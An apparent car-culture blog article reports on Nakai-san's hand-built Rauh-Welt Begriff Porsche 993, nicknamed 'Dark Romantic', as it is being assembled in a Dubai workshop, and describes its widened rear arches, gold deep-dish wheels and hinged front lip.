Rauh-Welt Dubai. Introducing Dark Romantic. Porsche

Well, he’s here. He’s been working non-stop since he arrived with little more than a change of underwear and a spare shirt. The work has taken place in an unassuming workshop in the back streets of Dubai’s Al Quoz district, where Nakai-san and a small team of helpers have been reassembling the pre-stripped 993 to resemble his one-off vision.

Each RWB car is unique, and born out of Nakai-san’s mind after meeting the donor car’s owner. There are no blue-prints, no moulds for standard parts. Each bodykit is custom-made in Japan by hand, and then installed by the designer himself.

When we visited, the car’s exterior was getting the final touches, although the interior, was still to be installed. Rest assured, we’ll be getting our hands on the finished product to undertake our usual glory shoot and if persuaded a video. In the meantime you can enjoy this sneaky peak.

The car has been named Dark Romantic – a reference, from what we understand, from Nakai-san to the owner’s wife. The main points to notice? Well, check out the widened rear. Some serious work has gone into filling those enormous rear arches, and the gap between tyre and bodywork is barely big enough for a credit card. We’re assured that it won’t rub though and having watched it bumble down the road we can corroborate that claim.

The massively deep dish gold wheels will house an iPhone lengthways, and the rubber doo-hickey mounted below the front bumper is hinged – no need to worry about speed bumps. An interesting little fact about the rivets used to mount said doo-hickey – they’re exactly the width of a lengthways packet of Winston cigarettes, the contents of which are permanently wedged between Nakai-san’s dirt-stained fingers as he mulls his next move.

This is, in all ways, a labour of love, and we can’t wait to get our hands on it when it’s finished. Or rather, when it’s finished for now – don’t be surprised to see Nakai-san and take this stage 1 RWB Porsche onto stage 2. Not to mention the next few projects on the horizon of the UAE >>>
